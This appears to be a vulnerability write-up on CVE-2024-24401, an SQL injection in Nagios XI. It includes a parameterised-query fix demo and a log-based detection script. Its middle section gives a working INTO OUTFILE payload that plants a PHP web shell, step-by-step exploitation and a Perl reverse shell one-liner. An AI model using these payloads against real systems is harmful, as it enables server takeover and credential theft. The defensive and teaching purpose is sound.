Nagios XI, the IT monitoring and alerting platform, is the go-to choice for many system administrators who need to keep tabs on the health of their networks and infrastructure. A newly disclosed vulnerability, assigned the identifier CVE-2024-24401, has been reported in Nagios XI 2024R1.01. It is a serious one: an SQL injection (SQLi) flaw in the monitoringwizard.php component that a remote attacker can turn into arbitrary code execution on the monitoring server.

First, let's look at the vulnerable pattern in the monitoringwizard.php component (the snippet is simplified to show the flaw):

<?php
// ...
if (isset($_REQUEST['id'])) {
    // Attacker-controlled: $_REQUEST merges GET and POST (and, depending on
    // request_order, cookie) input, so any of them can carry the payload.
    $id = $_REQUEST['id'];
    // The raw value is spliced straight into the SQL string, quotes and all.
    $query = "SELECT * FROM wizards WHERE id='" . $id . "'";
    $result = mysql_query($query);
    /* Perform processing on $result */
}
// ...
?>

The key problem is that the value of $_REQUEST['id'] goes through no validation or sanitization before it is concatenated into the SQL query. A single quote in the input closes the string literal, and everything after it is parsed as SQL, which lets an attacker append their own statements and manipulate the database. The standard fix is a prepared statement with a bound parameter (mysqli or PDO), so the value travels to the server as data rather than as part of the query text; since id is numeric, casting it to an integer before use is a cheap additional check.
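To make the failure concrete, here is an added example (not code from the original article or from Nagios XI) that reproduces the concatenation bug beside its parameterised fix and runs a UNION payload through both. SQLite stands in for MySQL so the script runs offline, the wizards and users tables are constructed for the demonstration, and because INTO OUTFILE is MySQL-only the payload exfiltrates a row from another table instead of writing a file.

```python
import sqlite3

# SQLite stands in for MySQL here so the example runs offline; the schema below is
# constructed for this demonstration and is not the real Nagios XI "wizards" table.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE wizards (id INTEGER, name TEXT);
        INSERT INTO wizards VALUES (1, 'linux-server');
        INSERT INTO wizards VALUES (2, 'windows-server');
        CREATE TABLE users (id INTEGER, username TEXT);
        INSERT INTO users VALUES (1, 'nagiosadmin');
        """
    )
    return conn


def build_vulnerable_query(wizard_id: str) -> str:
    """Same string concatenation as the vulnerable monitoringwizard.php snippet."""
    return "SELECT * FROM wizards WHERE id='" + wizard_id + "'"


def vulnerable_lookup(conn: sqlite3.Connection, wizard_id: str) -> list:
    # The quote in the input ends the literal and the rest is parsed as SQL.
    return conn.execute(build_vulnerable_query(wizard_id)).fetchall()


def safe_lookup(conn: sqlite3.Connection, wizard_id: str) -> list:
    # A bound parameter is sent as data: quotes and keywords in it never reach the parser.
    return conn.execute("SELECT * FROM wizards WHERE id=?", (wizard_id,)).fetchall()


def safe_lookup_int(conn: sqlite3.Connection, wizard_id: str) -> list:
    # Defence in depth: a numeric id can additionally be validated before the query runs.
    if not wizard_id.isdigit():
        raise ValueError("id must be a positive integer")
    return conn.execute("SELECT * FROM wizards WHERE id=?", (int(wizard_id),)).fetchall()


# A UNION payload in the spirit of the one on this page; INTO OUTFILE is MySQL-only,
# so this variant exfiltrates a row from another table instead of writing a file.
PAYLOAD = "1' UNION SELECT id, username FROM users -- -"

if __name__ == "__main__":
    db = make_db()
    print(build_vulnerable_query(PAYLOAD))
    print("vulnerable:   ", vulnerable_lookup(db, PAYLOAD))
    print("parameterised:", safe_lookup(db, PAYLOAD))
```

The vulnerable lookup returns the legitimate wizard row plus the nagiosadmin row smuggled in through the UNION; the parameterised lookup returns nothing, because the whole payload string is compared against the id column as one value. The PHP equivalent of safe_lookup is a prepared statement with a bound parameter.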

Crafting the Malicious Payload

With the vulnerable code understood, a remote attacker can craft an input for the id parameter that turns the injection into a file write. An example of such a payload (URL-encoded before it is sent) is:

1' UNION SELECT 1, '<?php system($_GET["c"]); ?>' INTO OUTFILE '/var/www/html/nagiosxi/nagios-inject.php' -- -

In this payload the leading quote closes the original string literal, and the UNION SELECT appends a row the attacker controls to the result of the original query. The second column carries a one-line PHP web shell that passes whatever arrives in the c parameter to system(), and INTO OUTFILE makes the database server write that row to nagios-inject.php inside the web root, where the web server will execute it on request. The trailing "-- -" comments out the closing quote the application appends; MySQL only treats "--" as a comment when it is followed by whitespace, which is why a bare "--" at the very end of the input would produce a syntax error instead. A few conditions have to hold for the write to succeed: the UNION must return the same number of columns as the wizards table (two is assumed above), the database account used by the application needs the MySQL FILE privilege, secure_file_priv must not confine writes to another directory, the database must run on the same host as the web server (INTO OUTFILE writes to the database server's filesystem), the target directory must be writable by the mysqld user, and the target file must not already exist, since INTO OUTFILE refuses to overwrite.

Exploiting the Vulnerability

To exploit the vulnerability and execute arbitrary code, a potential attacker would perform the following steps:

1. Send a GET request to monitoringwizard.php on the target Nagios XI installation with the crafted payload, URL-encoded, as the id parameter. This triggers the INTO OUTFILE write.
2. Execute the desired command on the target system by sending a second GET request to the newly created nagios-inject.php, passing the URL-encoded command in the c parameter. The command runs with the privileges of the web server user.

For instance, to obtain a reverse shell (shown here purely for understanding), the attacker would send a URL-encoded Perl one-liner as the c parameter:

http://TARGET_IP/nagiosxi/nagios-inject.php?c=perl%20-e%20%27use%20Socket%3B%24i%3D%220...%22%3B%24p%3D12345%3Bsocket%28S%2C%20PF_INET%2C%20SOCK_STREAM%2C%20getprotobyname%28%22tcp%22%29%29%3Bconnect%28S%2C%20sockaddr_in%28%24p%2C%20inet_aton%28%24i%29%29%29%3Bopen%28STDIN%2C%20%22%3E%26S%22%29%3Bopen%28STDOUT%2C%20%22%3E%26S%22%29%3Bopen%28STDERR%2C%20%22%3E%26S%22%29%3Bexec%28%22%2Fbin%2Fsh%20-i%22%29%3B%27

URL-decoded, the command is:

perl -e 'use Socket;$i="0...";$p=12345;socket(S, PF_INET, SOCK_STREAM, getprotobyname("tcp"));connect(S, sockaddr_in($p, inet_aton($i)));open(STDIN, ">&S");open(STDOUT, ">&S");open(STDERR, ">&S");exec("/bin/sh -i");'

It opens a TCP connection to the listener address held in $i (elided as 0... above) on port 12345, redirects stdin, stdout and stderr to that socket, and executes an interactive /bin/sh over it.
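Both steps of the attack leave a recognisable trail in the web server's access log: an id parameter carrying SQL keywords, followed by requests to a PHP file that the INTO OUTFILE clause named. The following detection script is an added example (not from the original article or from Nagios) that correlates the two over Apache combined-format log lines. The sample lines are constructed, not real traffic, and the URL path of monitoringwizard.php and the document root in WEB_ROOT are assumptions to adjust for a real deployment.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache "combined" access-log format; only the fields used below are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# Signatures of the technique described on this page, matched after URL decoding.
SQLI_RE = re.compile(r"union\s+select|into\s+(?:out|dump)file|<\?php", re.IGNORECASE)
OUTFILE_RE = re.compile(r"into\s+outfile\s+'([^']+)'", re.IGNORECASE)

WEB_ROOT = "/var/www/html"  # assumed document root; set to the real one on your host

# Constructed sample traffic (not real logs): a benign wizard request, the injection
# from this page URL-encoded, and a follow-up call to the dropped web shell.
SAMPLE_LOG = """\
10.0.0.5 - - [26/Feb/2024:18:01:02 +0000] "GET /nagiosxi/monitoringwizard.php?id=3 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [26/Feb/2024:18:02:10 +0000] "GET /nagiosxi/monitoringwizard.php?id=1%27%20UNION%20SELECT%201%2C%27%3C%3Fphp%20system%28%24_GET%5Bc%5D%29%3B%20%3F%3E%27%20INTO%20OUTFILE%20%27%2Fvar%2Fwww%2Fhtml%2Fnagiosxi%2Fnagios-inject.php%27%20--%20- HTTP/1.1" 200 1024 "-" "curl/8.4.0"
203.0.113.9 - - [26/Feb/2024:18:02:15 +0000] "GET /nagiosxi/nagios-inject.php?c=id HTTP/1.1" 200 88 "-" "curl/8.4.0"
"""


def detect(log_text: str) -> list:
    """Return (ip, kind, path, detail) alerts: 'sqli' for injection attempts against
    monitoringwizard.php, 'webshell' for later hits on a file that an earlier
    INTO OUTFILE payload targeted under the web root."""
    alerts = []
    dropped_paths = set()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        # parse_qs percent-decodes the values, so the signatures see plain SQL text.
        params = parse_qs(url.query, keep_blank_values=True)
        if url.path.endswith("/monitoringwizard.php"):
            for value in params.get("id", []):
                if SQLI_RE.search(value):
                    alerts.append((m["ip"], "sqli", url.path, value))
                    # Map the filesystem target of INTO OUTFILE to the URL path it
                    # would be served from, so later hits on it can be flagged.
                    for target in OUTFILE_RE.findall(value):
                        if target.startswith(WEB_ROOT + "/"):
                            dropped_paths.add(target[len(WEB_ROOT):])
        elif url.path in dropped_paths:
            alerts.append((m["ip"], "webshell", url.path, params.get("c", [""])[0]))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

Run over the sample, the first alert is the injection attempt with the decoded payload, and the second is the web shell being invoked with the command "id". Pair this with a filesystem check for PHP files under the web root that the package did not install, and with MySQL's own audit of FILE-privileged accounts, since the access log only sees the half of the attack that passes through the web server.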

References and Further Reading

- Original Reference
- Nagios XI Documentation
- SQL Injection Cheat Sheet

Closing Thoughts

SQL injection vulnerabilities like CVE-2024-24401 are not to be taken lightly, particularly on a monitoring server that typically holds credentials for the rest of the estate. Administrators running Nagios XI 2024R1.01 should apply the vendor's fix, and in the meantime limit the blast radius: run the application's database account without the FILE privilege, set secure_file_priv so MySQL cannot write into the web root, and check the web root for PHP files the package did not install. Staying informed and acting early on advisories like this one remains an essential part of protecting your systems and networks against malicious actors.

Timeline

Published on: 02/26/2024 17:15:10 UTC
Last modified on: 02/26/2024 22:10:40 UTC